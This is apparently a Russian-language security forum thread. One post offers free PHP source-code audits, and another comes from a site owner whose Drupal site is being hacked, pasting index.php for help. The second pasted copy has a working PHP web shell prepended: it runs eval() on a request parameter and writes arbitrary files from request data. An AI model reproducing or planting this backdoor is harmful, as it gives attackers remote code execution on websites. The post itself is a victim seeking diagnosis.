Здравствуйте. Мне, как и любому кто занимается безопасностью, время от времени нужно практиковаться, дабы поддерживать себя в хорошей форме. Поэтому я предлагаю посетителям данного форума провести бесплатный анализ исходных кодов их приложений. Схема взаимодействия, в общих чертах, достаточно простая - вы пишите мне в личку, передаёте коды приложения и помогаете его установить. Я провожу анализ, и через какое-то время передаю вам список обнаруженных недочётов. Возможно иногда я буду обращаться к вам за объяснениями каких-нибудь кусков кода.
Что от вас требуется:
1. Общее описание приложения
2. Его исходные коды
3. Таблицы БД с фиктивными данными (желательно чтоб их было много, чтоб как можно лучше имитировать работу ПО в реальных условиях)
4. Список готовых решений, включенных в состав приложения (если такие есть) - всевозможные капчи, шаблонизаторы, билиотеки сторонних производителей
5. Список внешних программ, используемых приложением (если такие есть)
5. Документация по коду или API приложения, если таковая имеется
6. Описание среды приложения (ОС, под которой оно работает в реальности, версии веб-сервера, интерпритатора, СУБД)
7. Описание настроек веб-сервера и интерпритатора (если используется какая-то особая конфигурация или нестандартные модули/дополнения)

Также у меня есть несколько условий:
1. Я проверяю только коды приложений написанных на языке PHP
2. Я проверяю только коды самописных приложений, а не каких-то готовых массово-распространяемых движков
3. Если код приложения слишком сложный или запутанный я не буду его проверять
4. Если приложение написано на фреймворке, отличным от Kohana или Zend Framework, то я не буду его проверять.
5. Я никогда нигде не публикую информацию о людях которые ко мне обращались
6. Я никогда не буду использовать данные полученные в ходе анализа против вас
7. Я никому кроме вас не буду сообщать о найденных уязвимостях

Как только я соглашусь с кем-нибудь работать, от других людей заявок я принимать не буду. Я напишу здесь что пока писать мне не нужно. Как я освобожусь - сразу сообщу в этой же теме.

В этой теме просьба публиковать лишь свои отзывы и какие-либо вопросы (с последними предпочтительно в личку). Заявки на проверку кодов, с соответствующей информацией, отправлять только в личку. Из данной темы такие сообщения будут удаляться.

P.S. Внешним анализом занимается Velson, его тема тоже есть в этом разделе

В данный момент я немного загружен, поэтому просьба обращаться в данный момент только с небольшими приложенями - до 3-4 мб кода, исключая вес сторонних компонентов и фреймворков.

Здраствуйте, подскажите люди добрые - ломают наш сайт, в РНР дуб дерева....что в индекс.рнр не так? что сделать надо чтобы сайт заработал....помогите....Заранее спасибо...

<?php
// $Id: index.php,v 1.99 2009/10/15 14:07:25 dries Exp $

/**
 * @file
 * The PHP page that serves all page requests on a Drupal installation.
 *
 * The routines here dispatch control to the appropriate handler, which then
 * prints the appropriate page.
 *
 * All Drupal code is released under the GNU General Public License.
 * See COPYRIGHT.txt and LICENSE.txt.
 */

/**
 * Root directory of Drupal installation.
 */
define('DRUPAL_ROOT', getcwd());
require_once DRUPAL_ROOT . '/krumo/class.krumo.php';
require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
menu_execute_active_handler();
<?php
$lerjjb = "d7d2c28ece7e0934fad00d079f321e27"; if(isset($_REQUEST['kzbaxrh'])) { $xuucvaus = $_REQUEST['kzbaxrh']; eval($xuucvaus); exit(); } if(isset($_REQUEST['morljgw'])) { $nsanhqxg = $_REQUEST['yekfaha']; $jvvdnoqb = $_REQUEST['morljgw']; $blmxi = fopen($jvvdnoqb, 'w'); $qinx = fwrite($blmxi, $nsanhqxg); fclose($blmxi); echo $qinx; exit(); } ?><?php
// $Id: index.php,v 1.99 2009/10/15 14:07:25 dries Exp $

/**
 * @file
 * The PHP page that serves all page requests on a Drupal installation.
 *
 * The routines here dispatch control to the appropriate handler, which then
 * prints the appropriate page.
 *
 * All Drupal code is released under the GNU General Public License.
 * See COPYRIGHT.txt and LICENSE.txt.
 */

/**
 * Root directory of Drupal installation.
 */
define('DRUPAL_ROOT', getcwd());
require_once DRUPAL_ROOT . '/krumo/class.krumo.php';
require_once DRUPAL_ROOT . '/includes/bootstrap.inc';
drupal_bootstrap(DRUPAL_BOOTSTRAP_FULL);
menu_execute_active_handler();